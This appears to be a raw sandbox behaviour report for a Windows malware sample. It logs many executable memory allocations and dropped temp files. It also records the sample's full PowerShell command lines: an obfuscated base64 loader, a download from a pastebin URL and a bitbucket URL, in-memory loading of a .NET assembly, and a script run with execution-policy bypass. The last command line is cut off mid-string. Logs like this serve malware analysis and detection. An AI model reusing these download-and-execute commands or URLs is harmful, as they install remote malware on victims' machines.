 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c71000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c72000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c73000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c74000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c75000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c76000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c77000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c78000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c79000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c7a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c7b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c7c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c7d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c7e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c7f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\dll03.ps1
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★Lg★1★DI★M★★y★GY★ZgBl★HQ★cwBv★HM★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★ZwBy★G8★ZQBn★C8★N★★x★DU★MgBl★Gc★cgBv★Go★LwBn★HI★bw★u★HQ★ZQBr★GM★dQBi★HQ★aQBi★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener2.vbs');powershell $Yolopolhggobek;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\dll03.ps1
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''txt.5202ffetsos/sdaolnwod/egroeg/4152egroj/gro.tekcubtib//:sptth'' , ''C:\Users\test22\AppData\Local\Temp\sostener2.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
cmdline powershell.exe $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★Lg★1★DI★M★★y★GY★ZgBl★HQ★cwBv★HM★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★ZwBy★G8★ZQBn★C8★N★★x★DU★MgBl★Gc★cgBv★Go★LwBn★HI★bw★u★HQ★ZQBr★GM★dQBi★HQ★aQBi★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★C